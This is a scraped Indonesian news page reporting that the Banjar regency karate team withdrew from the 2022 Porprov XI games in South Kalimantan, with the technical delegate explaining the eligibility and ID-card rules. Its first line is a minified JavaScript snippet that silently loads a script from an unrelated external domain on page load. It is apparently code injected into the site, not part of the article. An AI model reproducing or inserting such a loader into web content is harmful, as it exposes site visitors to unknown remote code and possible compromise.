(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Olahraga

Tim Karate Banjar Tarik Atlet, Begini Penjelasan Technical Delegate Porprov XI Kalsel


KANALKALIMANTAN.COM, KANDANGAN – Pekan Olahraga Provinsi (Porprov) XI Kalimantan Selatan (Kalsel) dikejutkan tim karate kontingen Kabupaten Banjar memilih walk out (WO) dari perhelatan ajang pesta olahraga terbesar di Banua.

Tim karate Kabupaten Banjar memilih WO karena merasa sengaja dijegal dan diintimidasi oleh oknum wasit serta juri dari Cabor tersebut.

Aksi WO tim karate Banjar dari Porprov XI dibenarkan dan langsung diklarifikasi Ketua Technical Delegate (TD) Porprov XI Kalsel 2022 cabang olahraga (Cabor) karate, H Fawahisah Mahabatan.

WO yang dilakukan tim karate Banjar lantaran sejumlah atlet mereka tidak bisa turun bertanding pada Porprov XI kalsel di HSS. Mereka tidak bisa tampil lantaran sebelumnya tidak berpartisipasi pada ajang Kejurprov.

 

 

Baca juga: Geger Pengakuan Apitu Ismail Bolang Setor Rp 6 M ke Kabareskrim Hasil Tambang Ilegal

Fawahisah menjelaskan bahwa mekanisme yang dilakukan tim keabsahan verifikasi dan tim Technical Delegate hanya mematuhi aturan yang telah dibuat untuk Porprov dari Komite Olahraga Nasional Indonesia (KONI) Provinsi ke KONI Kabupaten Kota.

“Dari acuan itu dipersyaratkan bahwa yang pertama mengikuti Porprov adalah yang telah mengikuti Kejurprov. Sementara tim karate Kabupaten Banjar memaksakan yang tidak ikut Kejurprov dapat tampil di Porprov,” kata Fawahisah, Sabtu (5/11/2022).

Menurut Fawahisah, tim kareta Kabupaten Banjar tetap bersikeras. Padahal, aturan itu sudah diperjelas dan dipertegas dalam manual hand book.

Terkait informasi tersebut yang dibilang begitu cepat oleh tim kareta Kabupaten Banjar, hal itu dibantah Ketua TD Cabor Karate Porprov XI Kalsel. Pihak TD, kata dia, sudah menyarankan untuk mengkonfirmasi kepada KONI.

“Karena yang menyebarkan hand book itu adalah KONI. KONI Provinsi sebagai induk organisasi yang memverifikasi data dan administrasi,” jelasnya.

Baca juga: Gaya Paman Birin Naik Trail saat Pembukaan Porprov XI Kalsel di HSS

Fawahisah menduga lantaran kecewa, oknum official tim karate Kabupaten Banjar kemudian menarik dan menahan id card atlet mereka yang akan bertanding. Padahal sebagian dari atlet karate Kabupaten Banjar ada yang memenuhi syarat, masih termasuk dalam drawing dan siap untuk bertanding.

“Orangtua dari atlet yang bisa bertanding itu kemudian mendatangi kami, dan menanyakan kenapa anaknya tidak bisa bertanding. Kami jelaskan bahwa mereka tidak bisa bertanding lantaran tidak memegang id card. Sementara id card itu merupakan salah satu kelengkapan wajib yang harus dimiliki atlet. Kalau tidak ada id card, otomatis tidak bisa bertanding,” urainya.

Sementara dari aturan, lanjut Fawahisah, sebagai atlet yang sudah lolos sudah boleh untuk bertanding dan tidak ada aturan untuk ditarik. Fawahisah pun mengaku sangat menyayangkan hal ini karena justru merugikan atlet yang dapat bertanding. Yang rugikan atlet, sementara pengurus tidak memahami tentang ini.

“Jadi Technical Delegate ini hanya mengatur, menyikapi dan penegakan aturan-aturan yang telah dipersyaratkan,” pungkasnya. (Kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : bie


Risa

Recent Posts

Gelar FKP, Usaha Balai Besar Labkesmas Banjarbaru Tingkatan Pelayanan

KANALKALIMANTAN.COM, BANJARBARU - Balai Besar Laboratorium Kesehatan Masyarakat (BB Labkesmas) Banjarbaru Kalimantan Selatan (Kalsel) menerima… Read More

51 menit ago

“Dialektika di Ujung Joran” Dapur Budaya HSS Juara Kompetisi Film Pendek Dispersip Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Kompetisi film pendek yang diselenggarakan Dinas Perpustakaan dan Kearsipan (Dispersip) Provinsi Kalimantan… Read More

1 jam ago

Diduga Timbulkan Aroma Tak Sedap, DLH Banjarbaru Minta Aeris Hotel Cek IPAL

KANALKALIMANTAN.COM, BANJARBARU - Instalasi pengolahan air limbah milik Aeris Hotel diduga mengeluarkan aroma tak sedap.… Read More

2 jam ago

Kasus Penusukan Siswa SMAN 7 Banjarmasin, ABH Dijatuhi Hukuman Pembinaan 1 Tahun

KANALKALIMANTAN.COM, BANJARMASIN - Hakim Pengadilan Negeri (PN) Banjarmasin menyatakan Anak yang Berhadapan dengan Hukum (ABH),… Read More

3 jam ago

Wujudkan Keinginan Masyarakat, Saidi Mansyur Resmikan Pasar Hewan Karangintan

KANALKALIMANTAN.COM, MARTAPURA - Pasar Hewan Karangintan dan Kontes Ternak Kabupaten Banjar 2024, di Desa Padang… Read More

4 jam ago

Satu Wasaka Award 2024, Tim Juri Sambangi Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sehubungan dengan adanya Sanitasi dan Air Minum Tuntas Waja Sampai Kaputing (Satu… Read More

8 jam ago

This website uses cookies.